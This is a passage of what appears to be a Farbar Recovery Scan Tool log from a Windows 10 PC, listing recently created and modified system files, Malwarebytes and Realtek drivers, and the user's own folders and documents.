    2017-01-10 22:58 - 2016-12-14 00:06 - 00509792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
    2017-01-10 22:58 - 2016-12-14 00:01 - 01557808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
    2017-01-10 22:58 - 2016-12-13 23:45 - 00147968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32k.sys
    2017-01-10 22:58 - 2016-12-13 23:42 - 00167424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinSCard.dll
    2017-01-10 22:58 - 2016-12-13 23:36 - 00074752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
    2017-01-10 22:58 - 2016-12-13 23:35 - 00712192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
    2017-01-10 22:58 - 2016-12-13 23:35 - 00553984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptui.dll
    2017-01-10 22:58 - 2016-12-13 23:22 - 02998272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
    2017-01-10 22:58 - 2016-12-13 23:22 - 02748416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpcore.dll
    2017-01-10 22:57 - 2016-12-21 00:59 - 00218976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offlinesam.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 03892864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 01852720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 01360464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 01277344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfasfsrcsnk.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 01201872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 00980832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll
    2017-01-10 22:57 - 2016-12-20 23:41 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll
    2017-01-10 22:57 - 2016-12-20 23:39 - 01300480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
    2017-01-10 22:57 - 2016-12-20 23:35 - 04612608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
    2017-01-10 22:57 - 2016-12-20 23:35 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\indexeddbserver.dll
    2017-01-10 22:57 - 2016-12-20 23:33 - 19413504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
    2017-01-10 22:57 - 2016-12-20 23:32 - 19417600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
    2017-01-10 22:57 - 2016-12-20 23:27 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll
    2017-01-10 22:57 - 2016-12-20 23:26 - 01155072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVP9DEC.dll
    2017-01-10 22:57 - 2016-12-20 23:25 - 06474752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspaint.exe
    2017-01-10 22:57 - 2016-12-20 23:24 - 06044160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
    2017-01-10 22:57 - 2016-12-20 23:24 - 05061120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
    2017-01-10 22:57 - 2016-12-20 23:24 - 03733504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
    2017-01-10 22:57 - 2016-12-20 23:24 - 00886272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
    2017-01-10 22:57 - 2016-12-14 00:21 - 02206496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msmpeg2vdec.dll
    2017-01-10 22:57 - 2016-12-14 00:01 - 00382784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AUDIOKSE.dll
    2017-01-10 22:57 - 2016-12-14 00:01 - 00076984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\remoteaudioendpoint.dll
    2017-01-10 22:57 - 2016-12-13 23:46 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
    2017-01-10 22:57 - 2016-12-13 23:40 - 00231424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll
    2017-01-10 22:57 - 2016-12-13 23:40 - 00104448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.UI.Logon.ProxyStub.dll
    2017-01-10 22:57 - 2016-12-13 23:38 - 13869056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
    2017-01-10 22:57 - 2016-12-13 23:38 - 00213504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.CredDialogController.dll
    2017-01-10 22:57 - 2016-12-13 23:35 - 00755712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
    2017-01-10 22:57 - 2016-12-13 23:32 - 00806400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3D12.dll
    2017-01-10 22:57 - 2016-12-13 23:32 - 00497152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LogonController.dll
    2017-01-10 22:57 - 2016-11-02 07:01 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
    2017-01-10 22:57 - 2016-08-01 23:30 - 00822784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
    2017-01-10 22:48 - 2016-12-21 02:49 - 00328008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll
    2017-01-10 22:47 - 2016-12-21 03:08 - 00136032 _____ (Microsoft Corporation) C:\WINDOWS\system32\ImplatSetup.dll
    2017-01-10 22:47 - 2016-12-21 03:04 - 07816032 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
    2017-01-10 22:47 - 2016-12-21 02:43 - 04130440 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
    2017-01-10 22:47 - 2016-12-21 02:43 - 01454504 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetsrc.dll
    2017-01-10 22:47 - 2016-12-21 02:43 - 01071736 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll
    2017-01-10 22:47 - 2016-12-21 02:43 - 00092512 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
    2017-01-10 22:47 - 2016-12-21 02:42 - 22224480 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
    2017-01-10 22:47 - 2016-12-21 02:42 - 01988560 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
    2017-01-10 22:47 - 2016-12-21 02:42 - 01702392 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfasfsrcsnk.dll
    2017-01-10 22:47 - 2016-12-21 02:42 - 01300600 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
    2017-01-10 22:47 - 2016-12-21 02:41 - 01600632 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
    2017-01-10 22:47 - 2016-12-21 02:14 - 00043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
    2017-01-10 22:47 - 2016-12-21 02:13 - 00119808 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCsp.dll
    2017-01-10 22:47 - 2016-12-21 02:12 - 00083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProvPluginEng.dll
    2017-01-10 22:47 - 2016-12-21 02:10 - 00234496 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCore.dll
    2017-01-10 22:47 - 2016-12-21 02:09 - 00368640 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneBackupHandler.dll
    2017-01-10 22:47 - 2016-12-21 02:09 - 00363520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BioFeedback.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 01292288 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 00418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BlockedShutdown.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 00360448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpencom.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 00349184 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 00289792 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeveloperOptionsSettingsHandlers.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 00211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
    2017-01-10 22:47 - 2016-12-21 02:07 - 00748544 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
    2017-01-10 22:47 - 2016-12-21 02:06 - 06285312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
    2017-01-10 22:47 - 2016-12-21 02:06 - 00310784 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncSettings.dll
    2017-01-10 22:47 - 2016-12-21 02:06 - 00260608 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
    2017-01-10 22:47 - 2016-12-21 02:06 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
    2017-01-10 22:47 - 2016-12-21 02:05 - 00425984 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
    2017-01-10 22:47 - 2016-12-21 02:05 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
    2017-01-10 22:47 - 2016-12-21 02:01 - 09131008 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
    2017-01-10 22:47 - 2016-12-21 01:59 - 01908224 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
    2017-01-10 22:47 - 2016-12-21 01:56 - 00947712 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVP9DEC.dll
    2017-01-10 22:47 - 2016-12-21 01:56 - 00936960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll
    2017-01-10 22:47 - 2016-12-21 01:55 - 08129536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
    2017-01-10 22:47 - 2016-12-21 01:55 - 04749312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
    2017-01-10 22:47 - 2016-12-21 01:53 - 06664192 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspaint.exe
    2017-01-10 22:47 - 2016-12-21 01:51 - 08075776 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
    2017-01-10 22:47 - 2016-12-21 01:49 - 04149248 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
    2017-01-10 22:47 - 2016-12-21 01:49 - 02691072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
    2017-01-10 22:47 - 2016-12-21 01:49 - 01062912 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
    2017-01-10 22:47 - 2016-12-21 01:47 - 01121280 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
    2017-01-10 22:47 - 2016-12-14 00:34 - 02482280 _____ (Microsoft Corporation) C:\WINDOWS\system32\msmpeg2vdec.dll
    2017-01-10 22:47 - 2016-12-14 00:23 - 00404832 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
    2017-01-10 22:47 - 2016-12-14 00:19 - 00584544 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
    2017-01-10 22:47 - 2016-12-14 00:17 - 00319288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64.dll
    2017-01-10 22:47 - 2016-12-14 00:14 - 01694712 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
    2017-01-10 22:47 - 2016-12-13 23:46 - 00206848 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
    2017-01-10 22:47 - 2016-12-13 23:43 - 00201728 _____ (Microsoft Corporation) C:\WINDOWS\system32\ScDeviceEnum.dll
    2017-01-10 22:47 - 2016-12-13 23:42 - 00352768 _____ (Microsoft Corporation) C:\WINDOWS\system32\cloudAP.dll
    2017-01-10 22:47 - 2016-12-13 23:42 - 00236544 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSCard.dll
    2017-01-10 22:47 - 2016-12-13 23:40 - 00193536 _____ (Microsoft Corporation) C:\WINDOWS\system32\certprop.dll
    2017-01-10 22:47 - 2016-12-13 23:39 - 00837632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
    2017-01-10 22:47 - 2016-12-13 23:39 - 00290816 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
    2017-01-10 22:47 - 2016-12-13 23:37 - 00090112 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
    2017-01-10 22:47 - 2016-12-13 23:36 - 01002496 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
    2017-01-10 22:47 - 2016-12-13 23:36 - 00539648 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
    2017-01-10 22:47 - 2016-12-13 23:26 - 00932864 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
    2017-01-10 22:47 - 2016-12-13 23:26 - 00869888 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
    2017-01-10 22:47 - 2016-12-13 23:25 - 02009600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRHInproc.dll
    2017-01-10 22:47 - 2016-12-13 23:24 - 00673792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
    2017-01-10 22:47 - 2016-12-13 23:23 - 03134976 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcore.dll
    2017-01-10 22:47 - 2016-12-13 23:22 - 02317824 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
    2017-01-10 22:47 - 2016-12-13 23:22 - 01513472 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
    2017-01-10 22:47 - 2016-12-13 23:22 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
    2017-01-10 22:47 - 2016-12-13 23:21 - 03616768 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
    2017-01-10 22:46 - 2016-12-21 03:08 - 00245600 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinesam.dll
    2017-01-10 22:46 - 2016-12-21 02:46 - 00624048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
    2017-01-10 22:46 - 2016-12-21 02:42 - 00241504 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
    2017-01-10 22:46 - 2016-12-21 02:15 - 22563840 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
    2017-01-10 22:46 - 2016-12-21 02:05 - 00261632 _____ (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll
    2017-01-10 22:46 - 2016-12-21 02:00 - 00440320 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhcfg.dll
    2017-01-10 22:46 - 2016-12-21 01:59 - 00883712 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
    2017-01-10 22:46 - 2016-12-21 01:58 - 23678464 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
    2017-01-10 22:46 - 2016-12-21 01:57 - 00462336 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhsettingsprovider.dll
    2017-01-10 22:46 - 2016-12-21 01:53 - 04474368 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
    2017-01-10 22:46 - 2016-12-21 01:51 - 05611008 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
    2017-01-10 22:46 - 2016-12-21 01:50 - 01490432 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
    2017-01-10 22:46 - 2016-12-13 23:48 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
    2017-01-10 22:46 - 2016-12-13 23:42 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.UI.Logon.ProxyStub.dll
    2017-01-10 22:46 - 2016-12-13 23:41 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
    2017-01-10 22:46 - 2016-12-13 23:40 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
    2017-01-10 22:46 - 2016-12-13 23:40 - 00266752 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConsoleLogon.dll
    2017-01-10 22:46 - 2016-12-13 23:39 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.CredDialogController.dll
    2017-01-10 22:46 - 2016-12-13 23:38 - 17188864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
    2017-01-10 22:46 - 2016-12-13 23:35 - 00600576 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptui.dll
    2017-01-10 22:46 - 2016-12-13 23:24 - 01005568 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3D12.dll
    2017-01-10 22:46 - 2016-12-13 23:23 - 01231872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
    2017-01-10 22:46 - 2016-12-13 23:22 - 00707584 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
    2017-01-10 22:45 - 2016-12-21 02:37 - 00455520 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
    2017-01-10 22:45 - 2016-12-21 01:54 - 05511680 _____ (Microsoft Corporation) C:\WINDOWS\system32\aclui.dll
    2017-01-10 22:45 - 2016-12-21 01:53 - 01692672 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
    2017-01-10 22:45 - 2016-12-21 01:51 - 02275840 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
    2017-01-10 22:45 - 2016-12-14 00:41 - 01235296 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
    2017-01-10 22:45 - 2016-12-14 00:41 - 00590960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
    2017-01-10 22:45 - 2016-12-14 00:33 - 01356864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipUp.exe
    2017-01-10 22:45 - 2016-12-14 00:18 - 00715104 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdmp.sys
    2017-01-10 22:45 - 2016-12-14 00:18 - 00335712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
    2017-01-10 22:45 - 2016-12-14 00:14 - 00418952 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
    2017-01-10 22:45 - 2016-12-14 00:14 - 00089416 _____ (Microsoft Corporation) C:\WINDOWS\system32\remoteaudioendpoint.dll
    2017-01-10 22:45 - 2016-12-13 23:38 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll
    2017-01-10 22:45 - 2016-11-02 06:00 - 00534096 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
    2017-01-10 22:45 - 2016-11-02 05:28 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll
    2017-01-10 22:45 - 2016-11-02 05:22 - 00337920 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
    2017-01-10 22:45 - 2016-11-02 05:21 - 00942080 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
    2017-01-10 17:38 - 2017-02-01 18:26 - 00176064 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMChameleon.sys
    2017-01-10 17:37 - 2017-02-01 21:20 - 00110536 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
    2017-01-10 17:37 - 2017-02-01 21:20 - 00091584 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
    2017-01-10 17:37 - 2017-01-31 23:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
    2017-01-10 17:37 - 2017-01-20 07:47 - 00077416 _____ C:\WINDOWS\system32\Drivers\mbae64.sys
    2017-01-10 17:37 - 2017-01-10 17:37 - 00001919 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
    2017-01-10 17:37 - 2017-01-10 17:37 - 00000000 ____D C:\Program Files\Malwarebytes
    2017-01-10 08:16 - 2017-01-31 15:36 - 00000000 ____D C:\Users\Joseph\Desktop\Marina
    2017-01-08 19:56 - 2017-01-31 20:39 - 00000000 ___RD C:\Users\Joseph\Creative Cloud Files
    2017-01-08 19:53 - 2017-01-08 19:53 - 00000000 ____D C:\Users\Joseph\AppData\Local\CEF
    2017-01-08 19:49 - 2017-01-08 19:49 - 00804440 _____ (Adobe Systems Incorporated) C:\Users\Joseph\Downloads\CreativeCloudSet-Up (1).exe
    2017-01-06 16:13 - 2017-01-06 16:13 - 00000000 ____D C:\Program Files\Common Files\Intel
    2017-01-06 16:13 - 2017-01-06 16:13 - 00000000 ____D C:\Program Files (x86)\Cisco
    2017-01-04 16:04 - 2017-01-04 16:04 - 00313276 _____ C:\Users\Joseph\Downloads\reciept2.pdf
    2017-01-04 16:04 - 2017-01-04 16:04 - 00273789 _____ C:\Users\Joseph\Downloads\reciept1.pdf
    2017-01-03 19:19 - 2017-01-24 21:11 - 00000000 ____D C:\Users\Joseph\Desktop\Joe
    2017-01-02 16:12 - 2017-02-01 20:58 - 00093053 _____ C:\Users\Joseph\Desktop\Annual Budget - 2017.xlsx
    2017-01-02 16:12 - 2017-01-31 23:03 - 00087912 _____ C:\Users\Joseph\Desktop\A79BE330

    ==================== One Month Modified files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2017-02-01 21:29 - 2016-09-23 17:44 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Skype
    2017-02-01 21:25 - 2016-07-16 01:04 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
    2017-02-01 21:19 - 2016-09-22 19:47 - 00043968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
    2017-02-01 21:18 - 2016-09-29 09:24 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
    2017-02-01 21:18 - 2016-09-29 08:58 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
    2017-02-01 21:18 - 2016-09-22 19:48 - 00251848 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
    2017-02-01 21:18 - 2016-09-22 19:41 - 00000000 __SHD C:\Users\Joseph\IntelGraphicsProfiles
    2017-02-01 21:17 - 2016-09-29 09:03 - 00000000 ____D C:\Users\Joseph
    2017-02-01 21:17 - 2016-07-16 01:04 - 00524288 _____ C:\WINDOWS\system32\config\BBI
    2017-02-01 20:56 - 2016-09-29 08:55 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
    2017-02-01 19:33 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\NDF
    2017-02-01 17:43 - 2016-07-16 06:47 - 00000000 ___HD C:\Program Files\WindowsApps
    2017-02-01 17:43 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\AppReadiness
    2017-02-01 17:17 - 2016-09-29 09:03 - 01320142 _____ C:\WINDOWS\system32\PerfStringBackup.INI
    2017-02-01 08:53 - 2016-10-29 21:04 - 00000000 ____D C:\Users\Joseph\AppData\Local\Adobe
    2017-02-01 08:45 - 2016-07-16 06:45 - 00000000 ____D C:\WINDOWS\INF
    2017-01-31 23:31 - 2016-10-18 20:11 - 00000000 ____D C:\Users\Joseph\AppData\Local\ElevatedDiagnostics
    2017-01-31 23:05 - 2016-09-23 11:59 - 00000368 _____ C:\WINDOWS\Tasks\HPCeeScheduleForJoseph.job
    2017-01-31 21:05 - 2016-09-29 09:23 - 00003264 _____ C:\WINDOWS\System32\Tasks\HPCeeScheduleForJoseph
    2017-01-31 20:50 - 2016-10-09 20:00 - 00000000 ____D C:\Program Files (x86)\ShopTracker
    2017-01-31 20:39 - 2016-10-29 21:14 - 00000000 ____D C:\ProgramData\boost_interprocess
    2017-01-30 21:00 - 2016-10-09 20:01 - 00000000 ____D C:\Users\Joseph\AmazonMeter
    2017-01-28 18:25 - 2016-10-01 10:34 - 00000000 ____D C:\Users\Joseph\Desktop\Bank School
    2017-01-25 00:38 - 2016-07-16 06:36 - 00000000 ____D C:\WINDOWS\CbsTemp
    2017-01-21 21:06 - 2016-09-29 08:55 - 00357720 _____ C:\WINDOWS\system32\FNTCACHE.DAT
    2017-01-21 20:43 - 2015-10-30 01:28 - 00000000 ____D C:\Users\Default.migrated
    2017-01-21 09:20 - 2016-09-23 17:44 - 00000000 ____D C:\ProgramData\Skype
    2017-01-20 18:50 - 2016-12-15 07:50 - 00003292 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
    2017-01-20 18:49 - 2016-09-22 19:45 - 00002377 _____ C:\Users\Joseph\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
    2017-01-20 18:49 - 2016-09-22 19:45 - 00000000 ___RD C:\Users\Joseph\OneDrive
    2017-01-19 18:39 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\ELAMBKUP
    2017-01-18 22:54 - 2016-09-28 12:54 - 00000000 ____D C:\Users\Joseph\Documents\UserTesting
    2017-01-18 22:27 - 2016-09-22 20:21 - 00000000 ____D C:\Users\Joseph\AppData\Local\UserTestingPlugin
    2017-01-15 15:52 - 2016-11-09 10:50 - 00000000 ____D C:\Users\Joseph\Documents\TurboTax
    2017-01-15 15:45 - 2016-11-09 10:48 - 00000479 _____ C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
    2017-01-15 15:30 - 2016-11-09 10:49 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Intuit
    2017-01-15 15:30 - 2016-11-09 10:46 - 00000000 ____D C:\Program Files (x86)\TurboTax
    2017-01-15 14:07 - 2016-07-16 06:47 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
    2017-01-15 14:05 - 2016-04-01 13:57 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
    2017-01-13 19:46 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\LiveKernelReports
    2017-01-13 15:56 - 2016-09-29 08:59 - 00168695 _____ C:\WINDOWS\system32\Drivers\rtkhdasetting.zip
    2017-01-13 15:56 - 2016-09-29 08:59 - 00002081 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\B&O Play Audio Control.lnk
    2017-01-13 15:56 - 2016-09-29 08:59 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
    2017-01-13 15:56 - 2016-08-06 13:49 - 00000000 ___HD C:\Program Files (x86)\Temp
    2017-01-13 15:53 - 2016-08-06 13:49 - 05523456 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\Drivers\RTKVHD64.sys
    2017-01-13 15:53 - 2016-08-06 13:49 - 03503048 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkApi64.dll
    2017-01-13 15:53 - 2016-08-06 13:49 - 03201376 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RltkAPO64.dll
    2017-01-13 15:53 - 2016-08-06 13:49 - 02995000 _____ (DTS, Inc.) C:\WINDOWS\system32\slcnt64.dll
    2017-01-13 15:53 - 2016-08-06 13:49 - 02839520 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\RtlExUpd.dll
    2017-01-13 15:53 - 2016-08-06 13:49 - 00192976 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkCfg64.dll
    2017-01-13 15:53 - 2016-08-06 13:49 - 00023688 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkCoLDR64.dll
    2017-01-13 15:53 - 2016-04-01 13:31 - 00000000 ____D C:\SWSetup
    2017-01-12 11:14 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\rescache
    2017-01-11 00:22 - 2015-11-02 13:02 - 00000000 __RHD C:\Users\Public\AccountPictures
    2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
    2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
    2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\oobe
    2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\ShellExperiences
